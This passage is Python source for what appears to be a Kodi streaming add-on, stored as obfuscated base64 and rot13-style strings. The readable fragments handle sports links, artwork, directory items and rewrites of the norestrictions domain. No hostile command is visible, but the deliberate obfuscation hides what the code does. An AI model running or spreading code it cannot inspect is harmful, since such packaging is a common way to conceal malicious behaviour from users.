JdLnN0cmlwKClbMTg6XQogICAgICAgICAgICAgICAgaWYgcGFnZSA9PSAiIjoKICAgICAgICAgICAgICAgICAgICBwYWdlID0gIjFhIgogICAgICAgICAgICAgICAgbW9kZSA9ICJnZXRfaG9ja2V5X3JlY2FwcyIKICAgICAgICAgICAgICAgIGlzX3BsYXlhYmxlID0gRmFsc2UKICAgICAgICAgICAgICAgIGxpbmsgPSBwYWdlCiAgICAgICAgICAgIGVsaWYgInNwb3J0X25mbF9nYW1lcyIgaW4gaXRlbVsibGluayJdOgogICAgICAgICAgICAgICAgZmFyZ3MgPSBpdGVtWyJsaW5rIl0ucmVwbGFjZSgic3BvcnRfbmZsX2dhbWVzKCIsICIiKVs6LTFdCiAgICAgICAgICAgICAgICBpZiAic3BvcnQiIGluIGZhcmdzOgogICAgICAgICAgICAgICAgICAgIGZhcmdzID0gIiIKICAgICAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICAgICAgZmFyZ3MgPSBmYXJncy5zcGxpdCgiLCIpCiAgICAgICAgICAgICAgICAgICAgaWYgbGVuKGZhcmdzKSAhPSAyOgogICAgICAgICAgICAgICAgICAgICAgICBmYXJncyA9ICIiCiAgICAgICAgICAgICAgICBtb2RlID0gInNwb3J0X25mbF9nYW1lcyIKICAgICAgICAgICAgICAgIGlzX3BsYXlhYmxlID0gRmFsc2UKICAgICAgICAgICAgICAgIGxpbmsgPSBmYXJncwogICAgICAgICAgICBlbGlmICJzcG9ydF9uZmxfZ2V0X2dhbWUoIiBpbiBpdGVtWyJsaW5rIl06CiAgICAgICAgICAgICAgICBmYXJnID0gaXRlbVsibGluayJdLnJlcGxhY2UoInNwb3J0X25mbF9nZXRfZ2FtZSgiLCAiIilbOi
0xXQogICAgICAgICAgICAgICAgbW9kZSA9ICJnZXRfbmZsX2dhbWUiCiAgICAgICAgICAgICAgICBsaW5rID0gZmFyZwogICAgICAgICAgICBlbGlmICJzcG9ydF9jb25kZW5zZWRfbmZsX2dhbWVzIiBpbiBpdGVtWyJsaW5rIl06CiAgICAgICAgICAgICAgICBmYXJncyA9IGl0ZW1bImxpbmsiXS5yZXBsYWNlKCJzcG9ydF9jb25kZW5zZWRfbmZsX2dhbWVzKCIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIiKVs6LTFdCiAgICAgICAgICAgICAgICBpZiAic3BvcnQiIGluIGZhcmdzOgogICAgICAgICAgICAgICAgICAgIGZhcmdzID0gIiIKICAgICAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICAgICAgZmFyZ3MgPSBmYXJncy5zcGxpdCgiLCIpCiAgICAgICAgICAgICAgICAgICAgaWYgbGVuKGZhcmdzKSAhPSAyOgogICAgICAgICAgICAgICAgICAgICAgICBmYXJncyA9ICIiCiAgICAgICAgICAgICAgICBtb2RlID0gInNwb3J0X2NvbmRlbnNlZF9uZmxfZ2FtZXMiCiAgICAgICAgICAgICAgICBpc19wbGF5YWJsZSA9IEZhbHNlCiAgICAgICAgICAgICAgICBsaW5rID0gZmFyZ3MKICAgICAgICAgICAgZWxpZiAic3BvcnRfY29uZGVuc2VkX25mbF9nZXRfZ2FtZSgiIGluIGl0ZW1bImxpbmsiXToKICAgICAgICAgICAgICAgIGZhcmcgPSBpdGVtWyJsaW5rIl0ucmVwbGFjZSgic3BvcnRfY29uZGVuc2VkX25mbF9nZXRfZ2FtZSgiLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIiKVs6LTFdCiAgICAgICAgICAgICAgICBtb2RlID0gInNwb3J0X2NvbmRlbnNlZF9uZmxfZ2V0X2dhbWUiCiAgICAgICAgICAgICAgICBpc19wbGF5YWJsZSA9IEZhbHNlCiAgICAgICAgICAgICAgICBsaW5rID0gZmFyZwoKICAgICAgICAgICAgIyBmaWx0ZXIgb3V0ICJ1bnJlbGVhc2VkIgogICAgICAgICAgICBpZiB0aXRsZSA9PSAiIiBvciAiIC90aXRsZSIgaW4gdGl0bGUgb3IgIi8gdGl0bGUiIGluIHRpdGxlOgogICAgICAgICAgICAgICAgcmV0dXJuCgogICAgICAgICAgICBjb250ZXh0ID0gZ2V0X2NvbnRleHRfaXRlbXMoaXRlbSkKCiAgICAgICAgICAgIGNvbnRlbnQgPSBpdGVtWyJjb250ZW50Il0KICAgICAgICAgICAgaWYgY29udGVudCA9PSAiYm94c2V0IjoKICAgICAgICAgICAgICAgIGNvbnRlbnQgPSAic2V0IgogICAgICAgICAgICBpZiBjb250ZW50ICE9ICcnOgogICAgICAgICAgICAgICAgc2VsZi5jb250ZW50ID0gY29udGVudAogICAgICAgICAgICBpbWRiID0gaXRlbVsiaW1kYiJdCiAgICAgICAgICAgIHNlYXNvbiA9IGl0ZW1bInNlYXNvbiJdIG9yICcwJwogICAgICAgICAgICBlcGlzb2RlID0gaXRlbVsiZXBpc29kZSJdIG9yICcwJwogICAgICAgICAgICB5ZWFyID0gaXRlbVsieWVhciJdIG9yICcwJwogICAgICAgICAgICBmYW5hcnQgPSBOb25lCiAgICAgICAgICAgIGlmIGVuYWJsZV9naWZzOgogICAgICAgICAgICAgICAgZmFuX3VybCA9IGl0ZW0uZ2V0KCJhbmltYXRlZF9mYW5hcnQiLCAiIikKICAgICAgICAgICAgICAgIGlmIGZhbl91cmwgYW5kIGZhbl91cmwgIT0gIjAiOgogICAgICAgICAgICAgICAgICAgIGZhbmFydCA9IHJlcGxhY2VfdXJsKGZhbl91cmwpCiAgICAgICAgICAgIGlmIG5vdCBmYW5hcnQ6CiAgICAgICAgICAgICAgICBmYW5hcnQgPSByZXBsYWNlX3VybChpdGVtLmdldCgiZmFuYXJ0IiwgIiIpLCByZXBsYWNlX2dpZj1GYWxzZSkKICAgICAgICAgICAgdGh1bWJuYWlsID0gTm9uZQogICAgICAgICAgICBpZiBlbmFibGVfZ2lmczoKICAgICAgICAgICAgICAgIHRodW1iX3VybCA9IGl0ZW0uZ2V0KCJhbmltYXRlZF90aHVtYm5haWwiLCAiIikKICAgICAgICAgICAgICAgIGlmIHRodW1iX3VybCBhbmQgdGh1bWJfdXJsICE9ICIwIjoKICAgICAgICAgICAgICAgICAgICB0aHVtYm5haWwgPSByZXBsYWNlX3VybCh0aHVtYl91cmwpCiAgICAgICAgICAgIGlmIG5vdCB0aHVtYm5haWw6CiAgICAgICAgICAgICAgICB0aHVtYm5haWwgPSByZXBsYWNlX3VybCgKICAgICAgICAgICAgICAgICAgICBpdGVtLmdldCgidGh1bWJuYWlsIiwgIiIpLCByZXBsYWNlX2dpZj1GYWxzZSkKCiAgICAgICAgICAgIHByZW1pZXJlZCA9IGl0ZW0uZ2V0KCJwcmVtaWVyZWQiLCAiIikKICAgICAgICAgICAgaWYgcHJlbWllcmVkOgogICAgICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgICAgIHRvZGF5X3R0ID0gZGF0ZXRpbWUuZGF0ZS50b2RheSgpLnRpbWV0dXBsZSgpCiAgICAgICAgICAgICAgICAgICAgcHJlbWllcmVkX3R0ID0gdGltZS5zdHJwdGltZShwcmVtaWVyZWQsICIlWS0lbS0lZCIpCiAgICAgICAgICAgICAgICAgICAgaWYgdG9kYXlfdHQgPCBwcmVtaWVyZWRfdHQ6CiAgICAgICAgICAgICAgICAgICAgICAgIHRpdGxlID0gIltDT0xPUnllbGxvd10iICsgdGl0bGUgKyAiWy9DT0xPUl0iCiAgICAgICAgICAgICAgICBleGNlcHQgRXhjZXB0aW9uLCBlOgogICAgICAgICAgICAgICAgICAgIGtvZGluZy5kb2xvZygid3JvbmcgcHJlbWllcmVkIGZvcm1hdDogIiArIHJlcHIoZSkpCiAgICAgICAgICAgICAgICAgICAgcGFzcwogICAgICAgICAgICB0cnk6CiAgICAgICAgICAgICAgICByZXN1bHRfaXRlbSA9IHsKICAgICAgICAgICAgICAgICAgICAnbGFiZWwnOiB0aXRsZSwKI
CAgICAgICAgICAgICAgICAgICAnaWNvbic6IHRodW1ibmFpbCwKICAgICAgICAgICAgICAgICAgICAnZmFuYXJ0JzogZmFuYXJ0LAogICAgICAgICAgICAgICAgICAgICdtb2RlJzogbW9kZSwKICAgICAgICAgICAgICAgICAgICAndXJsJzogbGluaywKICAgICAgICAgICAgICAgICAgICAnZm9sZGVyJzogbm90IGlzX3BsYXlhYmxlLAogICAgICAgICAgICAgICAgICAgICdpbWRiJzogaW1kYiwKICAgICAgICAgICAgICAgICAgICAnY29udGVudCc6IGNvbnRlbnQsCiAgICAgICAgICAgICAgICAgICAgJ3NlYXNvbic6IHNlYXNvbiwKICAgICAgICAgICAgICAgICAgICAnZXBpc29kZSc6IGVwaXNvZGUsCiAgICAgICAgICAgICAgICAgICAgJ2luZm8nOiB7fSwKICAgICAgICAgICAgICAgICAgICAneWVhcic6IHllYXIsCiAgICAgICAgICAgICAgICAgICAgJ2NvbnRleHQnOiBjb250ZXh0LAogICAgICAgICAgICAgICAgICAgICJzdW1tYXJ5IjogaXRlbS5nZXQoInN1bW1hcnkiLCBOb25lKQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgICAgICByZXR1cm4KICAgICAgICAgICAgaWYgZmFuYXJ0OgogICAgICAgICAgICAgICAgcmVzdWx0X2l0ZW1bInByb3BlcnRpZXMiXSA9IHsnZmFuYXJ0X2ltYWdlJzogZmFuYXJ0fQogICAgICAgICAgICAgICAgcmVzdWx0X2l0ZW1bJ2ZhbmFydF9zbWFsbCddID0gZmFuYXJ0CgogICAgICAgICAgICBpZiBjb250ZW50IGluIFsnbW92aWUnLCAnZXBpc29kZSddOgogICAgICAgICAgICAgICAgIyBvbmx5IGFkZCB3YXRjaGVkIGRhdGEgZm9yIGFwcGxpY2FibGUgaXRlbXMKICAgICAgICAgICAgICAgIHJlc3VsdF9pdGVtWydpbmZvJ'
love = '11oW3quqTAbMJDaKFN9VQNXVPNtVPNtVPNtVPNtpzI0qKWhVUWyp3IfqS9cqTIgPtbtVPNtMTIzVTqyqS94oJjbp2IfMvjtqKWfXGbXVPNtVPNtVPO1pzjtCFOmMJkzYaWypTkuL2IsqKWfXUIloPxXVPNtVPNtVPO4oJjtCFOmMJkzYzqyqS9wLJAbMJDbqKWfXDbtVPNtVPNtVUWyqUIlovO4oJjXPvNtVPOxMJLtM2I0K3ugoS91ozAuL2uyMPumMJkzYPO1pzjcBtbtVPNtVPNtVUIloPN9VUAyoTLhpzIjoTSwMI91pzjbqKWfXDbtVPNtVPNtVUugoPN9VUAyoTLhM2I0K2AuL2uyMPu1pzjfVTAuL2uyMQ1TLJkmMFxXVPNtVPNtVPOlMKE1pz4trT1fPtbtVPNtMTIzVTAfMJSlK2AuL2uyXUAyoTLcBtbtVPNtVPNtVTygpT9lqPO4Lz1wM3IcPvNtVPNtVPNtMTyuoT9aVQ0trTWgL2q1nF5RnJSfo2pbXDbtVPNtVPNtVTyzVTEcLJkiMl55MKAholuuMTEioy9hLJ1yYPOsXPWQoTIupvOLGHjtL2SwnTH/VvxcBtbtVPNtVPNtVPNtVPOeo2EcozphHzIgo3MyK1EuLzkyXPW4oJksL2SwnTHvXDbXVPNtVTEyMvOznKWmqS9lqJ5sq2y6LKWxXUAyoTLcBtbtVPNtVPNtVTygpT9lqPO4Lz1wM3IcPvNtVPNtVPNtLJExo24tCFO4Lz1wLJExo24hDJExo24bXDbtVPNtVPNtVTEcLJkiMlN9VUuvoJAaqJxhETyuoT9aXPxXVPNtVPNtVPOuMTEioy9hLJ1yVQ0trTWgL2SxMT9hYxSxMT9hXPxhM2I0DJExo25WozMiXPqhLJ1yWlxXVPNtVPNtVPOuMTEiov5mMKEGMKE0nJ5aXPWznKWmqS9lqJ4vYPNvMzSfp2HvXDbtVPNtVPNtVTyzVT5iqPOxnJSfo2phrJImoz8bLJExo25sozSgMFjtKltvHaIhVSAyqUIjVSqcrzSlMQ8vXFx6PvNtVPNtVPNtVPNtVUWyqUIlotbtVPNtVPNtVTyzVTEcLJkiMl55MKAholtXVPNtVPNtVPNtVPNtVPNtVTSxMT9hK25uoJHfPvNtVPNtVPNtVPNtVPNtVPNvL2uio3AyVT1iqzyyVT1yqTSxLKEuVUOlo3McMTIlVvjXVPNtVPNtVPNtVPNtVPNtVT5ioTSvMJj9KltvIR1RDvVcYNbtVPNtVPNtVPNtVPNtVPNtrJImoTSvMJj9KltvISWOF1DvXFx6PvNtVPNtVPNtVPNtVTSxMT9hYaAyqSAyqUEcozpbVz1iqzyyK21yqTSxLKEuK3Olo3McMTIlVvjtVyElLJg0VvxXVPNtVPNtVPOyoUAyBtbtVPNtVPNtVPNtVPOuMTEiov5mMKEGMKE0nJ5aXPWgo3McMI9gMKEuMTS0LI9jpz92nJEypvVfVPWHGHEPVvxXPvNtVPNtVPNtnJLtMTyuoT9aYayyp25iXNbtVPNtVPNtVPNtVPNtVPNtLJExo25sozSgMFjXVPNtVPNtVPNtVPNtVPNtVS8bVzAbo29mMFO0qvOgMKEuMTS0LFOjpz92nJEypvVcYNbtVPNtVPNtVPNtVPNtVPNtoz9fLJWyoQ1sXPWHIxEPVvxfPvNtVPNtVPNtVPNtVPNtVPO5MKAfLJWyoQ1sXPWHHxSYIPVcXGbXVPNtVPNtVPNtVPNtLJExo24hp2I0H2I0qTyhMltvqUMsoJI0LJEuqTSspUWiqzyxMKVvYPNvIUWun3DvXDbtVPNtVPNtVTIfp2H6PvNtVPNtVPNtVPNtVTSxMT9hYaAyqSAyqUEcozpbVaE2K21yqTSxLKEuK3Olo3McMTIlVvjtVyEJERVvXDbXVPNtVPNtVPOcMvOxnJSfo2phrJImoz8bPvNtVPNtVPNtVPNtVPNtVPOuMTEioy9hLJ1yYNbtVPNtVPNtVPNtVPNtVPNtKltvL2uio3AyVSAyoTIwqT9lVUE5pTHvXFjXVPNtVPNtVPNtVPNtVPNtVT5ioTSvMJj9KltvFRDiH0DvXFjXVPNtVPNtVPNtVPNtVPNtVUyyp2kuLzIfCI8bVxkcozftH2IfMJA0o3VvXFx6PvNtVPNtVPNtVPNtVTSxMT9hYaAyqSAyqUEcozpbVaImMI9fnJ5eK2EcLJkiMlVfVPW0paIyVvxXVPNtVPNtVPOyoUAyBtbtVPNtVPNtVPNtVPOxMJMuqJk0K2kcozgmVQ0tJ18bVxWCIRtvXFjtKltvFRDvXFjtKltvH0DvXI0XVPNtVPNtVPNtVPNtp2IfMJA0MJDtCFOxnJSfo2php2IfMJA0XS8bVzAbo29mMFOxMJMuqJk0VTkcozfvXFjtMTIzLKIfqS9fnJ5eplxXVPNtVPNtVPNtVPNtnJLtp2IfMJA0MJDtVG0tYGR6PvNtVPNtVPNtVPNtVPNtVPOuMTEiov5mMKEGMKE0nJ5aXPWxMJMuqJk0K2kcozfvYPOxMJMuqJk0K2kcozgmJ3AyoTIwqTIxKFxXPvNtVPNtVPNtqTuyoJImVQ0tJjbtVPNtVPNtVPNtVPNvERITDIIZIPVfVPWQDIWGVvjtVxACGR9IHxMIGPVfVPWYFHEGVvjtVx1CIxySHlVfVPWGHRSQEFVfPvNtVPNtVPNtVPNtVPWUFHLtGRyTEFVfVPWUFHLtGxSHIIWSVvjtVyIGEIVvPvNtVPNtVPNtKDbtVPNtVPNtVUAyoTIwqTIxVQ0tMTyuoT9aYaAyoTIwqPusXPWwnT9ip2HtqTuyoJHvXFjtqTuyoJImXDbtVPNtVPNtVTyzVUAyoTIwqTIxVPR9VP0kBtbtVPNtVPNtVPNtVPOuMTEiov5mMKEGMKE0nJ5aXPW0nTIgMFVfVUEbMJ1yp1gmMJkyL3EyMS0cPtbtVPNtVPNtVTyzVTEcLJkiMl55MKAholuuMTEioy9hLJ1yYNbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOsXPWSozSvoTHtE0yTVUA1pUOipaD/KT4vXFjXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtKltvGJS5VTAuqKAyVTymp3IyplOiovOfo3qypvOyozDtMTI2nJAyplVcXGbXVPNtVPNtVPNtVPNtLJExo24hp2I0H2I0qTyhMltvMJ5uLzkyK2qcMaZvYPNvqUW1MFVcPvNtVPNtVPNtMJkmMGbXVPNtVPNtVPNtVPNtLJExo24hp2I0H2I0qTyhMltvMJ5uLzkyK2qcMaZvYPNvMzSfp2HvXDbXVPNtVPNtVPOlMKE1pz4tIUW1MDbXVPNtVTEyMvOaMKEsqTuyoJIsoTymqPumMJkzXGbXVPNtVPNtVPOvLKAyK3IloPN9VPWbqUEjBv8iq3q3Yz5ipzImqUWcL3Eco25mYzAfqJVioz9lMKA0pzywqTyioaZhL2k1LvVXVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPN9VTWup2IsqKWf
VPftVv9lMJkiLJEyMP90nTIgMKZiVtbtVPNtVPNtVUEbMJ1yK2kcp3DtCFO7PvNtVPNtVPNtVPNtVPqwLKWmWmbtJjbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmZF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmZv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmZl5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmAP5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmAF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmAv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmAl5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmBP5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmBF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmZGNhnaOaVvjXVPNtVPNtVPNtVPNtKFjXVPNtVPNtVPNtVPNtW2AioT91pzM1oPp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzAioT91pzM1oP9wo2kiqKWzqJjkYzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWwo2kiqKWzqJjiL29fo3IlMaIfZv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL29fo3IlMaIfY2AioT91pzM1oQZhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzAioT91pzM1oP9wo2kiqKWzqJj0YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWwo2kiqKWzqJjiL29fo3IlMaIfAF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL29fo3IlMaIfY2AioT91pzM1oQLhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzAioT91pzM1oP9wo2kiqKWzqJj3YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWwo2kiqKWzqJjiL29fo3IlMaIfBP5dpTpvYNbtVPNtVPNtVPNtVPOqYNbtVPNtVPNtVPNtVPNan2yxplp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmRhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmVhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmZhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmDhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmHhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmLhnaOaVvjXVPNtVPNtVPNtVPNtKFjXVPNtVPNtVPNtVPNtW21iqzyyplp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVz1iqzyypl9go3McMKZkYzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWgo3McMKZioJ92nJImZv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvoJ92nJImY21iqzyypmZhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVz1iqzyypl9go3McMKZ0YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWgo3McMKZioJ92nJImAF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvoJ92nJImY21iqzyypmLhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVz1iqzyypl9go3McMKZ3YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWgo3McMKZioJ92nJImBP5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvoJ92nJImY21iqzyypmxhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVz1iqzyypl9go3McMKZkZP5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvoJ92nJImY21iqzyypmRkYzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWgo3McMKZioJ92nJImZGVhnaOaVvjXVPNtVPNtVPNtVPNtKFjXVPNtVPNtVPNtVPNtW3AjLJAyWmbtJjbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvp3OuL2Hip3OuL2HkYzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWmpTSwMF9mpTSwMGVhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVaAjLJAyY3AjLJAyZl5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvp3OuL2Hip3OuL2H0YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWmpTSwMF9mpTSwMGHhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVaAjLJAyY3AjLJAyAv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvp3OuL2Hip3OuL2H3YzcjMlVfPvNtVPNtVPNtVPNtVS0fPvNtVPNtVPNtVPNtVPqanJLtoTyzMFp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzqcMzkcMzHiL2y0rF5anJLvYNbtVPNtVPNtVPN
tVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvM2yzoTyzMF9yqyIDoHp2WGVjYFHlZRygM3IlYzqcMvVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWanJMfnJMyY25cM2u0WGVjoTyanUEmYzqcMvVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWanJMfnJMyY3AjnJ5hnJ5aWGVjq29ioP5anJLvYNbtVPNtVPNtVPNtVPOqYNbtVPNtVPNtVPNtVPNaM2yzVT5uqUIlMFp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzqcMz5uqUIlMF9zLJkfpl5anJLvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvM2yzozS0qKWyY2ywMJkuozDhM2yzVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzqcMz5uqUIlMF9eo3WyLFHlZTqupzEyov5anJLvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvM2yzozS0qKWyY3AerFHlZUquqzImYzqcMvVfPvNtVPNtVPNtVPNtVS0fPvNtVPNtVPNtsDbtVPNtVPNtVUWyqUIlovO0nTIgMI9fnKA0PtbtVPNtMTIzVTEcp3OfLKysoTymqPumMJkzYPOcqTIgpljtL29hqTIhqS90rKOyXGbXVPNtVPNtVPOcMvOwo250MJ50K3E5pTHtCG0tVaAyLKAioaZvBtbtVPNtVPNtVPNtVPOwo250MKu0K2y0MJ1mVQ0tJ10XVPNtVPNtVPNtVPNtnJLtDHERG04hM2I0H2I0qTyhMltvp2I0qTyhM3AsL29hqTI4qPVcVQ09VPW0paIyVwbXVPNtVPNtVPNtVPNtVPNtVTAioaEyrUEsnKEyoKZhLKOjMJ5xXNbtVPNtVPNtVPNtVPNtVPNtVPNtVPusXPWGMKE0nJ5aplVcYNbtVPNtVPNtVPNtVPNtVPNtVPNtVPNvHaIhHTk1M2yhXUfjsFxvYzMipz1uqPuaMKEsLJExo25sqKWfXPWGMKE0nJ5aplVcXFxcPvNtVP'
god = 'AgICAgICAgIHVybCA9IFtdCiAgICAgICAgICAgIGZvciBpdGVtIGluIGl0ZW1zOgogICAgICAgICAgICAgICAgdXJsLmFwcGVuZChpdGVtWyJ1cmwiXSkKICAgICAgICAgICAga29kaW5nLkFkZF9EaXIoCiAgICAgICAgICAgICAgICBuYW1lPV8oIkFsbCBFcGlzb2RlcyIpLAogICAgICAgICAgICAgICAgdXJsPXBpY2tsZS5kdW1wcyh1cmwpLAogICAgICAgICAgICAgICAgbW9kZT0iYWxsX2VwaXNvZGVzIiwKICAgICAgICAgICAgICAgIGZvbGRlcj1UcnVlLAogICAgICAgICAgICAgICAgaWNvbj1BRERPTi5nZXRBZGRvbkluZm8oImljb24iKSwKICAgICAgICAgICAgICAgIGZhbmFydD1BRERPTi5nZXRBZGRvbkluZm8oImZhbmFydCIpLAogICAgICAgICAgICAgICAgY29udGV4dF9pdGVtcz1jb250ZXh0X2l0ZW1zLAogICAgICAgICAgICAgICAgY29udGVudF90eXBlPSJ2aWRlbyIpCgogICAgICAgIGZvciBpdGVtIGluIGl0ZW1zOgogICAgICAgICAgICBjb250ZXh0X2l0ZW1zID0gW10KICAgICAgICAgICAgaWYgQURET04uZ2V0U2V0dGluZygic2V0dGluZ3NfY29udGV4dCIpID09ICJ0cnVlIjoKICAgICAgICAgICAgICAgIGNvbnRleHRfaXRlbXMuYXBwZW5kKAogICAgICAgICAgICAgICAgICAgIChfKCJTZXR0aW5ncyIpLAogICAgICAgICAgICAgICAgICAgICAiUnVuUGx1Z2luKHswfSkiLmZvcm1hdChnZXRfYWRkb25fdXJsKCJTZXR0aW5ncyIpKSkpCiAgICAgICAgICAgIGNvbnRleHRfaXRlbXMuZXh0ZW5kKGl0ZW1bImNvbnRleHQiXSkKICAgICAgICAgICAga29kaW5nLkFkZF9EaXIoCiAgICAgICAgICAgICAgICBuYW1lPWl0ZW1bImxhYmVsIl0sCiAgICAgICAgICAgICAgICB1cmw9aXRlbVsidXJsIl0sCiAgICAgICAgICAgICAgICBtb2RlPWl0ZW1bIm1vZGUiXSwKICAgICAgICAgICAgICAgIGZvbGRlcj1pdGVtWyJmb2xkZXIiXSwKICAgICAgICAgICAgICAgIGljb249aXRlbVsiaWNvbiJdLAogICAgICAgICAgICAgICAgZmFuYXJ0PWl0ZW1bImZhbmFydCJdLAogICAgICAgICAgICAgICAgY29udGV4dF9pdGVtcz1jb250ZXh0X2l0ZW1zLAogICAgICAgICAgICAgICAgY29udGVudF90eXBlPSJ2aWRlbyIsCiAgICAgICAgICAgICAgICBpbmZvX2xhYmVscz1pdGVtWyJpbmZvIl0sCiAgICAgICAgICAgICAgICBzZXRfcHJvcGVydHk9aXRlbS5nZXQoInByb3BlcnRpZXMiLCB7fSksCiAgICAgICAgICAgICAgICBzZXRfYXJ0PXsicG9zdGVyIjogaXRlbVsiaWNvbiJdfSkKICAgICAgICB4Ym1jcGx1Z2luLnNldENvbnRlbnQoaW50KHN5cy5hcmd2WzFdKSwgY29udGVudF90eXBlKQogICAgICAgIHJldHVybiBUcnVlCgogICAgZGVmIHJlcGxhY2VfdXJsKHNlbGYsIHVybCk6CiAgICAgICAgaWYgJ25vcmVzdHJpY3Rpb25zLm5vb2JzYW5kbmVyZHMuY29tJyBpbiB1cmwgYW5kICdub3Jlc3RyaWN0aW9ucy5jbHViL25vcmVzdHJpY3Rpb25zLmNsdWInIG5vdCBpbiB1cmw6CiAgICAgICAgICAgIHVybCA9IHVybC5yZXBsYWNlKCdub3Jlc3RyaWN0aW9ucy5ub29ic2FuZG5lcmRzLmNvbScsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIF9fYnVpbHRpbl9fLkJPQl9CQVNFX0RPTUFJTikKICAgICAgICBlbGlmICd3d3cubm9yZXN0cmljdGlvbnMuY2x1YicgaW4gdXJsIGFuZCAnd3d3Lm5vcmVzdHJpY3Rpb25zLmNsdWIvbm9yZXN0cmljdGlvbnMuY2x1Yicgbm90IGluIHVybCBhbmQgJ25vcmVzdHJpY3Rpb25zLmNsdWIvbm9y